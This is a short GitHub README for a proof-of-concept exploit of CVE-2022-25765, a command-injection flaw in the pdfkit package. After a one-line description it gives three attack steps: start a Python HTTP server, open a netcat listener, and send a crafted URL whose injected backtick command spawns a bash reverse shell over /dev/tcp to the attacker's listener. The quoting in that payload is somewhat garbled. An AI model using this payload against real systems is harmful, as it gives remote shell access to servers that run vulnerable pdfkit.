Skip to content

README.md

Latest commit

 

History

History
23 lines (17 loc) · 481 Bytes

README.md

File metadata and controls

23 lines (17 loc) · 481 Bytes

PDFkit-CMD-Injection

CVE-2022-25765 Detail

Description

The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized.

PoC

Start a HTTP server

1- python3 -m http.server 80

Start a netcat listener

2- nc -lnvp 'Target Port'

Make a request

3- http://"TARGET_ADDRESS:Target PORT"//?name=#{'%20`bash -c 'exec bash -i &>/dev/tcp/"Target_ADRESS/LISTENING_PORT"<&1'`'}